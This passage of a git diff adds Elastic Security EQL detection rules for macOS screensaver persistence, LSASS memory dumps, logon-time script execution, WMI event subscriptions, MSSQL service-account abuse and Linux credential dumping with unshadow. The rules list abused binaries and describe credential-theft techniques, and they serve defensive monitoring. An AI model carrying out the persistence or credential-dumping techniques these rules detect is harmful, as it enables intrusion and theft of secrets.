No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_107.json b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_107.json new file mode 100644 index 00000000000..16c02f03f5c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e6e8912f-283f-4d0d-8442-e0dcaf49944b_107.json @@ -0,0 +1,102 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies when a screensaver plist file is modified by an unexpected process. An adversary can maintain persistence on a macOS endpoint by creating a malicious screensaver (.saver) file and configuring the screensaver plist file to execute code each time the screensaver is activated.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Screensaver Plist File Modified by Unexpected Process", + "note": "## Triage and analysis\n\n- Analyze the plist file modification event to identify whether the change was expected or not\n- Investigate the process that modified the plist file for malicious code or other suspicious behavior\n- Identify if any suspicious or known malicious screensaver (.saver) files were recently written to or modified on the host\n", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and\n file.name: \"com.apple.screensaver.*.plist\" and\n file.path : (\n \"/Users/*/Library/Preferences/ByHost/*\",\n \"/Library/Managed Preferences/*\",\n \"/System/Library/Preferences/*\"\n ) and\n (\n process.code_signature.trusted == false or\n process.code_signature.exists == false or\n\n /* common script interpreters and abused native macOS bins */\n process.name : (\n \"curl\",\n \"mktemp\",\n \"tail\",\n \"funzip\",\n \"python*\",\n \"osascript\",\n \"perl\"\n )\n ) and\n\n /* Filter OS processes modifying screensaver plist files */\n not process.executable : (\n \"/usr/sbin/cfprefsd\",\n \"/usr/libexec/xpcproxy\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/Resources/MCXCompositor\",\n \"/System/Library/CoreServices/ManagedClient.app/Contents/MacOS/ManagedClient\"\n )\n", + "references": [ + "https://posts.specterops.io/saving-your-access-d562bf5bf90b", + "https://github.com/D00MFist/PersistentJXA" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.exists", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "e6e8912f-283f-4d0d-8442-e0dcaf49944b_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_2.json b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_2.json new file mode 100644 index 00000000000..f27e2de916e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e707a7be-cc52-41ac-8ab3-d34b38c20005_2.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the creation or modification of a medium size memory dump file which can indicate an attempt to access credentials from a process memory.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Memory Dump File Creation", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n\n /* MDMP header */\n file.Ext.header_bytes : \"4d444d50*\" and file.size >= 30000 and\n not\n\n (\n (\n process.name : \"System\" or\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WUDFHost.exe\",\n \"C:\\\\Windows\\\\System32\\\\rdrleakdiag.exe\",\n \"?:\\\\Windows\\\\System32\\\\Taskmgr.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\Taskmgr.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\SystemApps\\\\*.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\bin\\\\zCrashReport64.exe\"\n ) and process.code_signature.trusted == true\n ) or\n (\n file.path : (\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\*\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\WDF\\\\*\",\n \"?:\\\\ProgramData\\\\Alteryx\\\\ErrorLogs\\\\*\",\n \"?:\\\\ProgramData\\\\Goodix\\\\*\",\n \"?:\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Zoom\\\\logs\\\\zoomcrash*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\Crashpad\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\crashpaddb\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\HungReports\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\CrashDumps\\\\*\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\*\\\\NativeCrashReporting\\\\*\"\n ) and (process.code_signature.trusted == true or process.executable == null)\n )\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "file.Ext.header_bytes", + "type": "unknown" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.size", + "type": "long" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e707a7be-cc52-41ac-8ab3-d34b38c20005", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "e707a7be-cc52-41ac-8ab3-d34b38c20005_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106.json new file mode 100644 index 00000000000..d6cc8fb0f2d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of suspicious persistent programs (scripts, rundll32, etc.) by looking at process lineage and command line usage.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of Persistent Suspicious Program", + "query": "/* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */\nsequence by host.id, user.name with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"userinit.exe\" and process.parent.name : \"winlogon.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"explorer.exe\" and\n /* add suspicious programs here */\n process.pe.original_file_name in (\"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"RegAsm.exe\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\") and\n /* add potential suspicious paths here */\n process.args : (\"C:\\\\Users\\\\*\", \"C:\\\\ProgramData\\\\*\", \"C:\\\\Windows\\\\Temp\\\\*\", \"C:\\\\Windows\\\\Tasks\\\\*\", \"C:\\\\PerfLogs\\\\*\", \"C:\\\\Intel\\\\*\")\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 106 + }, + "id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107.json b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107.json new file mode 100644 index 00000000000..247fca0aeb1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies execution of suspicious persistent programs (scripts, rundll32, etc.) by looking at process lineage and command line usage.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Execution of Persistent Suspicious Program", + "query": "/* userinit followed by explorer followed by early child process of explorer (unlikely to be launched interactively) within 1m */\nsequence by host.id, user.name with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"userinit.exe\" and process.parent.name : \"winlogon.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"explorer.exe\"]\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.parent.name : \"explorer.exe\" and\n /* add suspicious programs here */\n process.pe.original_file_name in (\"cscript.exe\",\n \"wscript.exe\",\n \"PowerShell.EXE\",\n \"MSHTA.EXE\",\n \"RUNDLL32.EXE\",\n \"REGSVR32.EXE\",\n \"RegAsm.exe\",\n \"MSBuild.exe\",\n \"InstallUtil.exe\") and\n /* add potential suspicious paths here */\n process.args : (\"C:\\\\Users\\\\*\", \"C:\\\\ProgramData\\\\*\", \"C:\\\\Windows\\\\Temp\\\\*\", \"C:\\\\Windows\\\\Tasks\\\\*\", \"C:\\\\PerfLogs\\\\*\", \"C:\\\\Intel\\\\*\")\n ]\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "e7125cea-9fe1-42a5-9a05-b0792cf86f5a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_106.json b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_106.json new file mode 100644 index 00000000000..4fe15a7e154 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e72f87d0-a70e-4f8d-8443-a6407bc34643_106.json @@ -0,0 +1,88 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the creation of a WMI Event Subscription. Attackers can abuse this mechanism for persistence or to elevate to SYSTEM privileges.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious WMI Event Subscription Created", + "query": "any where event.dataset == \"windows.sysmon_operational\" and event.code == \"21\" and\n winlog.event_data.Operation : \"Created\" and winlog.event_data.Consumer : (\"*subscription:CommandLineEventConsumer*\", \"*subscription:ActiveScriptEventConsumer*\")\n", + "references": [ + "https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf", + "https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.Consumer", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.Operation", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e72f87d0-a70e-4f8d-8443-a6407bc34643", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1546", + "name": "Event Triggered Execution", + "reference": "https://attack.mitre.org/techniques/T1546/", + "subtechnique": [ + { + "id": "T1546.003", + "name": "Windows Management Instrumentation Event Subscription", + "reference": "https://attack.mitre.org/techniques/T1546/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "e72f87d0-a70e-4f8d-8443-a6407bc34643_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_3.json b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_3.json new file mode 100644 index 00000000000..e4d757f4073 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e74d645b-fec6-431e-bf93-ca64a538e0de_3.json @@ -0,0 +1,130 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies unusual process executions using MSSQL Service accounts, which can indicate the exploitation/compromise of SQL instances. Attackers may exploit exposed MSSQL instances for initial access or lateral movement.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Process For MSSQL Service Accounts", + "query": "process where event.type == \"start\" and host.os.type == \"windows\" and\n user.name : (\n \"SQLSERVERAGENT\", \"SQLAGENT$*\",\n \"MSSQLSERVER\", \"MSSQL$*\",\n \"MSSQLServerOLAPService\",\n \"ReportServer*\", \"MsDtsServer150\",\n \"MSSQLFDLauncher*\",\n \"SQLServer2005SQLBrowserUser$*\",\n \"SQLWriter\", \"winmgmt\"\n ) and user.domain : \"NT SERVICE\" and\n not (\n (\n process.name : (\n \"sqlceip.exe\", \"sqlservr.exe\", \"sqlagent.exe\",\n \"msmdsrv.exe\", \"ReportingServicesService.exe\",\n \"MsDtsSrvr.exe\", \"sqlbrowser.exe\", \"DTExec.exe\",\n \"SQLPS.exe\", \"fdhost.exe\", \"fdlauncher.exe\",\n \"SqlDumper.exe\", \"sqlsqm.exe\", \"DatabaseMail.exe\"\n ) or\n process.executable : (\n \"?:\\\\Windows\\\\System32\\\\wermgr.exe\",\n \"?:\\\\Windows\\\\System32\\\\conhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\"\n )\n ) and\n (\n process.code_signature.subject_name : (\"Microsoft Corporation\", \"Microsoft Windows\") and\n process.code_signature.trusted == true\n )\n ) and\n not (\n process.name : \"cmd.exe\" and process.parent.name : \"sqlservr.exe\"\n )\n", + "references": [ + "https://www.microsoft.com/en-us/security/blog/2023/08/24/flax-typhoon-using-legitimate-software-to-quietly-access-taiwanese-organizations/", + "https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/configure-windows-service-accounts-and-permissions?view=sql-server-ver16" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "e74d645b-fec6-431e-bf93-ca64a538e0de", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1210", + "name": "Exploitation of Remote Services", + "reference": "https://attack.mitre.org/techniques/T1210/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1505", + "name": "Server Software Component", + "reference": "https://attack.mitre.org/techniques/T1505/", + "subtechnique": [ + { + "id": "T1505.001", + "name": "SQL Stored Procedures", + "reference": "https://attack.mitre.org/techniques/T1505/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "e74d645b-fec6-431e-bf93-ca64a538e0de_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7.json new file mode 100644 index 00000000000..6209226c5a7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Unshadow", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"unshadow\" and process.args_count >= 3\n", + "references": [ + "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c", + "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.008", + "name": "/etc/passwd and /etc/shadow", + "reference": "https://attack.mitre.org/techniques/T1003/008/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json new file mode 100644 index 00000000000..351d0229d9a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/e7cb3cfd-aaa3-4d7b-af18-23b89955062c_8.json @@ -0,0 +1,94 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the execution of the unshadow utility which is part of John the Ripper, a password-cracking tool on the host machine. Malicious actors can use the utility to retrieve the combined contents of the '/etc/shadow' and '/etc/password' files. Using the combined file generated from the utility, the malicious threat actors can use them as input for password-cracking utilities or prepare themselves for future operations by gathering credential information of the victim.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Linux Credential Dumping via Unshadow", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and\nprocess.name == \"unshadow\" and process.args_count >= 3\n", + "references": [ + "https://www.cyberciti.biz/faq/unix-linux-password-cracking-john-the-ripper/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "e7cb3cfd-aaa3-4d7b-af18-23b89955062c", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you 